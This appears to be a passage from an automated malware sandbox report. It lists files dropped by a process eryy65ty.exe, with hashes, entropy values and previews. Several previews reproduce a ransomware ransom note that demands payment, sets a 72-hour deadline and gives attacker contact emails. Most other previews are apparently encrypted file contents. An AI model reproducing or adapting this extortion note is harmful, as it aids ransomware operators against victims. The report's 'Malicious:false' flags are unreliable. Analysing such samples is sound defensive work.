                                                                                                                                              SHA-512:67C049A9E8EFD4E97987F546E8090D3C86614AD09E2D60E586B2BAC0E43EB51754173A1D1101FA20236853EB3AD419D912370D41EB25F19041BC75BC1B898F39
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:......[...^.}.+.......O_\(q.b~..=....9......Q..v.O..G.......I....%..8.........#....N.l:...p.c.Y*...>mg..|-.....royT.>.W.........y(aO......E.<&.(..=.?.UI._...P. .. .>.6)...f.5+.......z.....D._.]@..x....Du...%.S.V..[h5..U.t.K...L..?......k~.<....w....|.y..d*..U.I.?w.8.47.\..(4..f.i......=...`.w.#+-..E5.....:^'..=.......5....Z..^Y....J..z..$....p.P....u.tx.....#...r.X..E.K....O..u...S*Pv...9...Wv.%..Jkmm.Fe...4.l..u.....Y....N..z?.I?.p-7.....?...:.h..z.#J1...+.xD. ....~...l.x./O.@#.,r.X..Z..W..ePrR.|`.y..=.6..i.hYg.....l..c...u....#W...A5.o2.Q...\.......8.......'......m...8.!.>..i.....$....}.r..v}......m).h.t.n...E...2S&.....o.....t....O..$|s1s.-..)d.Ce......'.....Z../.=.p.d.........Y.].....y..C...q...]......'.5..vQ...oxX..G.D.....d.......-.u....6F.9...PA...sQ7tlus..6|F.....ahq.Mh.I.y.q.P}i.-..|KT3........J...'4>..\.m.4....G.........y.D..7E..H.....N!..J.FN..!..)..%....K...Y;.O.:w.[...;.8.5iN..@......vPE...FwQ.=.G....E$$Y`......Y:t,.._6@zG.j0xABADC
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):10506
                                                                                                                                              Entropy (8bit):4.266259486061158
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:2+iXn7gsyq+LZtx72WR+SBN57356NKsP4tH6p:27n7gAkd5RoKZK
                                                                                                                                              MD5:AA156BEC19F950E35A906B863A1B7A30
                                                                                                                                              SHA1:E9CF2C199CA77DB98F74FCB61AEE221E6E8C4378
                                                                                                                                              SHA-256:32A1ECE3A876A5548ECF88B9C284C817BBD02C07B0C4953984D0A6D8F3CCCF6C
                                                                                                                                              SHA-512:A4A6AC156A735E2280C9C462B9CBC0DDA52FFBF80AD1806DE51D54694684D07423285786FE16317DC6C4C919F68307E61960CC654EC3CF0EB8ED02EE10417454
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...8P(...z.S9V^...IS<vug%+b.E...T(7.9t.j.....O.K..x{......MN....dw..y.y .......[..Nm.&e.t..C....{.-L.......>.&.8$DE.>.*....o...o.f}.e-..m...K.S...b...<.....|.b6=.#%.....a.D..AG.)z(Ob..&J.+oy...n.s.....W..Zn.w.......+.k..4v......@F.k..I....e..:.h?.Pq...:..oNoc...s>yR(.....^.m...>.\.R....[..(.a.......B..,>.._..v.xy?.:Z..@.O../.u....+R=......gP0..9....L..'.p....6....9...\[(OpUXJW..u(5.6Q... JC).....2....bx..C...8...G...{.....P...R4{7..1D]..O.....~..@..`..d/....}D.. ..i....e.......EC..>.\=...}.[k....E...L...E.....8..N.E....P_.Z._z.....w,6..".....j...7....SF..a-O..c...n..M..r.A..p....[.1i2....#wg..C.Q4f.P....#.".4.9...B.]...R}...Zc.E..Qa9.G....-..j...Z.X..B.X&}./...mwf......O.-... N..V.........mz.OR...X...+.S...).d.....#B. ...QO.......t.Fc.....M.W.ZN....pW{:..R...F..'...*\.....}'.M.%.U..U.t.?>7).h...+.Y......F.....wp..tP.....v2.~.z...jQfF\q....%.=a.T<...s.:..#{...'.B.....'.H%M..k0US. j.._\...... 4...\.N.D*...L.!k...f.3c.]?.%FOc...._.:....@R......>.A.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):10506
                                                                                                                                              Entropy (8bit):4.266259486061158
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:2+iXn7gsyq+LZtx72WR+SBN57356NKsP4tH6p:27n7gAkd5RoKZK
                                                                                                                                              MD5:AA156BEC19F950E35A906B863A1B7A30
                                                                                                                                              SHA1:E9CF2C199CA77DB98F74FCB61AEE221E6E8C4378
                                                                                                                                              SHA-256:32A1ECE3A876A5548ECF88B9C284C817BBD02C07B0C4953984D0A6D8F3CCCF6C
                                                                                                                                              SHA-512:A4A6AC156A735E2280C9C462B9CBC0DDA52FFBF80AD1806DE51D54694684D07423285786FE16317DC6C4C919F68307E61960CC654EC3CF0EB8ED02EE10417454
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...8P(...z.S9V^...IS<vug%+b.E...T(7.9t.j.....O.K..x{......MN....dw..y.y .......[..Nm.&e.t..C....{.-L.......>.&.8$DE.>.*....o...o.f}.e-..m...K.S...b...<.....|.b6=.#%.....a.D..AG.)z(Ob..&J.+oy...n.s.....W..Zn.w.......+.k..4v......@F.k..I....e..:.h?.Pq...:..oNoc...s>yR(.....^.m...>.\.R....[..(.a.......B..,>.._..v.xy?.:Z..@.O../.u....+R=......gP0..9....L..'.p....6....9...\[(OpUXJW..u(5.6Q... JC).....2....bx..C...8...G...{.....P...R4{7..1D]..O.....~..@..`..d/....}D.. ..i....e.......EC..>.\=...}.[k....E...L...E.....8..N.E....P_.Z._z.....w,6..".....j...7....SF..a-O..c...n..M..r.A..p....[.1i2....#wg..C.Q4f.P....#.".4.9...B.]...R}...Zc.E..Qa9.G....-..j...Z.X..B.X&}./...mwf......O.-... N..V.........mz.OR...X...+.S...).d.....#B. ...QO.......t.Fc.....M.W.ZN....pW{:..R...F..'...*\.....}'.M.%.U..U.t.?>7).h...+.Y......F.....wp..tP.....v2.~.z...jQfF\q....%.=a.T<...s.:..#{...'.B.....'.H%M..k0US. j.._\...... 4...\.N.D*...L.!k...f.3c.]?.%FOc...._.:....@R......>.A.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):24418
                                                                                                                                              Entropy (8bit):2.3646015655616317
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:/PAzwiMj+Sru1csifaLFIdiObx+XQykFPPwTLcc9j4sr6gl3rusVnT8VVz:/PAzZMbuuTaLFeISYTLc1G1isB0F
                                                                                                                                              MD5:80BC5BA5AEC78CDCA794AA58AFA30A94
                                                                                                                                              SHA1:25C82B86246CC86C1BEFCCAE9E14879A2BECC798
                                                                                                                                              SHA-256:3BE743EABA8152C8124DB966C4E22BBC798DE0FFDB8C7B3FCBBB4A37D8285763
                                                                                                                                              SHA-512:A79A61253FBD5283904CF903698365AA1E81455DB1F5AB2AA2CBB53118FF19A821419AD4942CCF71EA5B3C8654543E8C5A7266CB96C67F32025AA342DBDE7D6A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..A...S...._ ..H..f..^...(.~...(N..BH...o....1.!.xXL.....<.$....tfpZ....A...i.v&w.mKG..Fo..w........LI...|T.@...Rl..;k..%...PM......@N..0%...#.n...G....R2...}m7Iw.....'..U.`B...Iet..`q.%R7.....z.b.V.:.1......?,b.ET.....S..9c. .B.,zQxa.P-..#Gz.|W.......a.......f....+.]...;...*u..G..-.&(.y6.!.!...s{[......i..j.......r.9..s.....K|...f.y.....v...+KA$.u..(l..oI..}ukk.H.5.;..Q..3.y.S,.K)9p.K.Q..8N=I.e...M.f...qFx[.HeVgrV\#4e..^......6.....7...&+T..$.=.E.J#..Zruq<....+=......m..'.;Fc?....[._.Vc:..pM.....R...>Bc.Ja.6X...2...z?...^^.5...V......0P..G5h_^.Q.)#..2F....!Bt... :|.F..Hg.U.....[hU.H...W.5I4.bBb,..r..Tr...;....Yf.bs...*.Q...v|...my."2.C.?...a.........4...2.*.I.$.l.4..?....../...{...f..X...<..U.J.....E2.h..G..>f]p..Z2J#6k..s..r ..........%=....E.SbrnF&.....M;X..K.1+...?l.N_.u{O...P..r...O...u.7Jl._.D.pB....(EWa.cH.:.1..7;...>;..t#[.*..k..Y..N%Z..5zz..F(.nQ..s...iu.TD..x.....$1....M)g...."D.X..N.....,#..!J...BC.i..P.\...M.yG.$N.rI..tIy.z
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):24418
                                                                                                                                              Entropy (8bit):2.3646015655616317
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:/PAzwiMj+Sru1csifaLFIdiObx+XQykFPPwTLcc9j4sr6gl3rusVnT8VVz:/PAzZMbuuTaLFeISYTLc1G1isB0F
                                                                                                                                              MD5:80BC5BA5AEC78CDCA794AA58AFA30A94
                                                                                                                                              SHA1:25C82B86246CC86C1BEFCCAE9E14879A2BECC798
                                                                                                                                              SHA-256:3BE743EABA8152C8124DB966C4E22BBC798DE0FFDB8C7B3FCBBB4A37D8285763
                                                                                                                                              SHA-512:A79A61253FBD5283904CF903698365AA1E81455DB1F5AB2AA2CBB53118FF19A821419AD4942CCF71EA5B3C8654543E8C5A7266CB96C67F32025AA342DBDE7D6A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..A...S...._ ..H..f..^...(.~...(N..BH...o....1.!.xXL.....<.$....tfpZ....A...i.v&w.mKG..Fo..w........LI...|T.@...Rl..;k..%...PM......@N..0%...#.n...G....R2...}m7Iw.....'..U.`B...Iet..`q.%R7.....z.b.V.:.1......?,b.ET.....S..9c. .B.,zQxa.P-..#Gz.|W.......a.......f....+.]...;...*u..G..-.&(.y6.!.!...s{[......i..j.......r.9..s.....K|...f.y.....v...+KA$.u..(l..oI..}ukk.H.5.;..Q..3.y.S,.K)9p.K.Q..8N=I.e...M.f...qFx[.HeVgrV\#4e..^......6.....7...&+T..$.=.E.J#..Zruq<....+=......m..'.;Fc?....[._.Vc:..pM.....R...>Bc.Ja.6X...2...z?...^^.5...V......0P..G5h_^.Q.)#..2F....!Bt... :|.F..Hg.U.....[hU.H...W.5I4.bBb,..r..Tr...;....Yf.bs...*.Q...v|...my."2.C.?...a.........4...2.*.I.$.l.4..?....../...{...f..X...<..U.J.....E2.h..G..>f]p..Z2J#6k..s..r ..........%=....E.SbrnF&.....M;X..K.1+...?l.N_.u{O...P..r...O...u.7Jl._.D.pB....(EWa.cH.:.1..7;...>;..t#[.*..k..Y..N%Z..5zz..F(.nQ..s...iu.TD..x.....$1....M)g...."D.X..N.....,#..!J...BC.i..P.\...M.yG.$N.rI..tIy.z
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):530
                                                                                                                                              Entropy (8bit):7.639082548547538
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:siGmQsAcW76FNK7PyxnxT2K6Am9sgJ1PxeCDa0zwTlwn:sVsAcWlDqxwBgbEwTG
                                                                                                                                              MD5:36E1E10AF26601430B87F107B480A4F5
                                                                                                                                              SHA1:EC8BBB9AEDEB9F696D06E139D47C84A39FA4AEFC
                                                                                                                                              SHA-256:454BD499DCCF9FE464A97C45B867CEB9269735957285E63AC74AB991921CABB7
                                                                                                                                              SHA-512:7AA42AAC56FA30506427934B1E39D29786B13AB410A1907EA0A7CC5C628FCDCC9FEC9A0F779930FD44C9E045FC7CBEAF8E3F6C550FD2310941D7AC9B287D0E80
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...=...4..C.Q..L.....'J../...K...!..kOxe..?..e0.>.S....v.Y.O.Z8.....Q.I<.....w.Z.>..gd.........l..O6..]ju.m..C..q@22.G.0.OP...i....;%|.?D.i#.>...|..E...6|[.N..."Z.O.b.k...o.QUg......O^#..W.._.f...........T.^..t....23-....:....;...|....I.?/c..@Slt......[.."..l..R....z.....P:_..#....x.PD.. ..j{...2..l$..h..7...a.x.......v...R....3g..9..r.M...x....v./....6{.SZ(..e..LS...3@..x[z...la;.....v.a...p..N..v.......d.;.d.5.(]..,KA/i...h....)by.=.".....9.(....%...G.<.[..~k.#..........l,]P.=.&.....,%..!.,.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):530
                                                                                                                                              Entropy (8bit):7.639082548547538
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:siGmQsAcW76FNK7PyxnxT2K6Am9sgJ1PxeCDa0zwTlwn:sVsAcWlDqxwBgbEwTG
                                                                                                                                              MD5:36E1E10AF26601430B87F107B480A4F5
                                                                                                                                              SHA1:EC8BBB9AEDEB9F696D06E139D47C84A39FA4AEFC
                                                                                                                                              SHA-256:454BD499DCCF9FE464A97C45B867CEB9269735957285E63AC74AB991921CABB7
                                                                                                                                              SHA-512:7AA42AAC56FA30506427934B1E39D29786B13AB410A1907EA0A7CC5C628FCDCC9FEC9A0F779930FD44C9E045FC7CBEAF8E3F6C550FD2310941D7AC9B287D0E80
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...=...4..C.Q..L.....'J../...K...!..kOxe..?..e0.>.S....v.Y.O.Z8.....Q.I<.....w.Z.>..gd.........l..O6..]ju.m..C..q@22.G.0.OP...i....;%|.?D.i#.>...|..E...6|[.N..."Z.O.b.k...o.QUg......O^#..W.._.f...........T.^..t....23-....:....;...|....I.?/c..@Slt......[.."..l..R....z.....P:_..#....x.PD.. ..j{...2..l$..h..7...a.x.......v...R....3g..9..r.M...x....v./....6{.SZ(..e..LS...3@..x[z...la;.....v.a...p..N..v.......d.;.d.5.(]..,KA/i...h....)by.=.".....9.(....%...G.<.[..~k.#..........l,]P.=.&.....,%..!.,.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):14722
                                                                                                                                              Entropy (8bit):5.986189263755493
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:3RJiTHD6Ib0lZ6mgtdHOelGdWaolvsTNoM:oDEejJGxwGX
                                                                                                                                              MD5:56C048BE5FB4331FBD634F09FE23385B
                                                                                                                                              SHA1:837E3DBB63091407CC3FF63E9102C6657B960F46
                                                                                                                                              SHA-256:AF2980C109CC252B1C8EE51544AE9117ADA370C26DED115099B1D50C0CC49090
                                                                                                                                              SHA-512:CD0602EDFD956CC87EEBAC574ACB14448E4CA9593BD21C2EFA05686082764C8DD772A4F4F71449541800711E126E6C7F3DD42838D50F925036977F75E387E063
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.h......Xj.7.e.......Z.R.Oe..!.....!4.w..y}..0....l..+.\..P'...y.3.!.+.4...f...V.n.^..?.)r......w......Tn......}#......7o.G.....o...R.N.K...f=..!.:-.rD.....E....*Z..g...$.M.X.........u.7.\...x...3....b..'.9N..8.'...(.=....h.....0.px..c./.I&....h..E.c.[.U.y..i..H...'...M.'Q..c.........G.(.w.....\IIA..5.......C..@....(.#O...B P=.w...#2?.D..P*.@.....t......>4.w..g...}.....j..CS.. ...#..E....1.qN&..\....o....D.j\a.+.&.d.U[. w..6'...Z.7z.n|_Kb.d%3X).G.w..Z}G..._..~x..c....2.D.........9d..+|..a^..F.....k;.~]...C...x9..t1K.(.a.`.%...)..=...g.@hB2^p..aB/.....a9......V..+..s....7.....q...>..A..S.~...R..-..q..h..T...3..d..Yc..uY#.f.6.8t.9..rzY...D...|Y.9.._...v.o.-../.W3.it..q.......h...%v......MN.[?;....Q..V4}.'..e<..|/..t....M.g-...x..*E....\.....~"V,..w..o....V...~Z..y.`.aUS...Q...'!b........Vj.3.9....t.$3.&........Y.......[i.jk...t..mRI..Hg.X.n.... .}.@.%..u1a.k.b...5...V......[...h..(...,"T.~.a??..\.@n.i.Dg..9........Q...*BpS...~...4,_..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):14722
                                                                                                                                              Entropy (8bit):5.986189263755493
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:3RJiTHD6Ib0lZ6mgtdHOelGdWaolvsTNoM:oDEejJGxwGX
                                                                                                                                              MD5:56C048BE5FB4331FBD634F09FE23385B
                                                                                                                                              SHA1:837E3DBB63091407CC3FF63E9102C6657B960F46
                                                                                                                                              SHA-256:AF2980C109CC252B1C8EE51544AE9117ADA370C26DED115099B1D50C0CC49090
                                                                                                                                              SHA-512:CD0602EDFD956CC87EEBAC574ACB14448E4CA9593BD21C2EFA05686082764C8DD772A4F4F71449541800711E126E6C7F3DD42838D50F925036977F75E387E063
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.h......Xj.7.e.......Z.R.Oe..!.....!4.w..y}..0....l..+.\..P'...y.3.!.+.4...f...V.n.^..?.)r......w......Tn......}#......7o.G.....o...R.N.K...f=..!.:-.rD.....E....*Z..g...$.M.X.........u.7.\...x...3....b..'.9N..8.'...(.=....h.....0.px..c./.I&....h..E.c.[.U.y..i..H...'...M.'Q..c.........G.(.w.....\IIA..5.......C..@....(.#O...B P=.w...#2?.D..P*.@.....t......>4.w..g...}.....j..CS.. ...#..E....1.qN&..\....o....D.j\a.+.&.d.U[. w..6'...Z.7z.n|_Kb.d%3X).G.w..Z}G..._..~x..c....2.D.........9d..+|..a^..F.....k;.~]...C...x9..t1K.(.a.`.%...)..=...g.@hB2^p..aB/.....a9......V..+..s....7.....q...>..A..S.~...R..-..q..h..T...3..d..Yc..uY#.f.6.8t.9..rzY...D...|Y.9.._...v.o.-../.W3.it..q.......h...%v......MN.[?;....Q..V4}.'..e<..|/..t....M.g-...x..*E....\.....~"V,..w..o....V...~Z..y.`.aUS...Q...'!b........Vj.3.9....t.$3.&........Y.......[i.jk...t..mRI..Hg.X.n.... .}.@.%..u1a.k.b...5...V......[...h..(...,"T.~.a??..\.@n.i.Dg..9........Q...*BpS...~...4,_..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):302
                                                                                                                                              Entropy (8bit):7.213096502612327
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tynExGJ4PdUQ79+ORV1KYlzj28uA82laf8HB3vx7HEVABtmoR/kNS/tmbiaHn:EnEvOg9+OH1KEzjzu2laCB3tY8Z6Xn
                                                                                                                                              MD5:F63C4ACF9C2E6B7EDED4FE8C890E906E
                                                                                                                                              SHA1:908D2E04F26F858DFF8B4F0F8FC3F0F13E747003
                                                                                                                                              SHA-256:A0FA5A643A24E1BFB0D16B788A00E04FACC5461566AB6C2A8FE7BD1B1140D3CD
                                                                                                                                              SHA-512:1BAEA03DE877D1ECB7FA1C960DF3A416D6A0F43AFEC73751AF2D548B7AC4E6CDC62C04BEF48C0F4284D03D90D07116CEFC02D02CC6DE645860DB1E65EB276612
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:........m.._.T..=.sT.oZ.9..ks.;....*..|......b.4Q.*..; \..)....>)...x..+@f`g+.A...V.F...c..<.Xd..<..a.....&...Lh...E.;..9G....F..N.S~U.{6.._,G..\....O.Hr........Dd)..x..E9].7A..E.V..w.<.....3.e{8..Q........G.r.ah..z.....E|.]..B..UQ..w.Ah...05.L.z>./h%..{Qq.}...'.o0w.4....,..;.].5.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):302
                                                                                                                                              Entropy (8bit):7.213096502612327
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tynExGJ4PdUQ79+ORV1KYlzj28uA82laf8HB3vx7HEVABtmoR/kNS/tmbiaHn:EnEvOg9+OH1KEzjzu2laCB3tY8Z6Xn
                                                                                                                                              MD5:F63C4ACF9C2E6B7EDED4FE8C890E906E
                                                                                                                                              SHA1:908D2E04F26F858DFF8B4F0F8FC3F0F13E747003
                                                                                                                                              SHA-256:A0FA5A643A24E1BFB0D16B788A00E04FACC5461566AB6C2A8FE7BD1B1140D3CD
                                                                                                                                              SHA-512:1BAEA03DE877D1ECB7FA1C960DF3A416D6A0F43AFEC73751AF2D548B7AC4E6CDC62C04BEF48C0F4284D03D90D07116CEFC02D02CC6DE645860DB1E65EB276612
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:........m.._.T..=.sT.oZ.9..ks.;....*..|......b.4Q.*..; \..)....>)...x..+@f`g+.A...V.F...c..<.Xd..<..a.....&...Lh...E.;..9G....F..N.S~U.{6.._,G..\....O.Hr........Dd)..x..E9].7A..E.V..w.<.....3.e{8..Q........G.r.ah..z.....E|.]..B..UQ..w.Ah...05.L.z>./h%..{Qq.}...'.o0w.4....,..;.].5.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):320
                                                                                                                                              Entropy (8bit):7.228082147855611
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:UyGBRa4rn3yPNDObbRSnXaD+t+MIlyIW/2kH6sRbHDCv0qogQHn:FG64b3oNgapt+PlySkaspGsq8Hn
                                                                                                                                              MD5:A322DF3F75DCF09B3147CFAE4AA16337
                                                                                                                                              SHA1:3B47A093D3611F97CA34748485EE89965779D401
                                                                                                                                              SHA-256:8AC3643D4408D502A2099A456C3E1247259ACDFF06B5483DADB33E5B0C92D194
                                                                                                                                              SHA-512:E5FE08738F860FAEA0F4C876C4E0010BEB03B423E7022398B9597C6F74C2F9530478C0EF617508E5BB4EF3BA9ACE520A53AE43CB2F3647E56FF282B67F6EFF2A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.:.......=.9C.S.l.E.H.|...B,(..J....A.%."`..7........)..j..>6.A>.w.?....}....$.8.P...5*k)+.>.`]..Z9..bm.d..I_.`.........<E.....!... ?......y....*.J.Jk.&.l....`..+..c.......q.a...0x^1.7\..{v....k)i{"....[..Y,.h..[m...=[.@M#..6.A.L...,.A.A...V.w...8#...<....8Zjh...V._v..?B....H.^.......v..]...vL.z..E....0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):320
                                                                                                                                              Entropy (8bit):7.228082147855611
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:UyGBRa4rn3yPNDObbRSnXaD+t+MIlyIW/2kH6sRbHDCv0qogQHn:FG64b3oNgapt+PlySkaspGsq8Hn
                                                                                                                                              MD5:A322DF3F75DCF09B3147CFAE4AA16337
                                                                                                                                              SHA1:3B47A093D3611F97CA34748485EE89965779D401
                                                                                                                                              SHA-256:8AC3643D4408D502A2099A456C3E1247259ACDFF06B5483DADB33E5B0C92D194
                                                                                                                                              SHA-512:E5FE08738F860FAEA0F4C876C4E0010BEB03B423E7022398B9597C6F74C2F9530478C0EF617508E5BB4EF3BA9ACE520A53AE43CB2F3647E56FF282B67F6EFF2A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.:.......=.9C.S.l.E.H.|...B,(..J....A.%."`..7........)..j..>6.A>.w.?....}....$.8.P...5*k)+.>.`]..Z9..bm.d..I_.`.........<E.....!... ?......y....*.J.Jk.&.l....`..+..c.......q.a...0x^1.7\..{v....k)i{"....[..Y,.h..[m...=[.@M#..6.A.L...,.A.A...V.w...8#...<....8Zjh...V._v..?B....H.^.......v..]...vL.z..E....0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
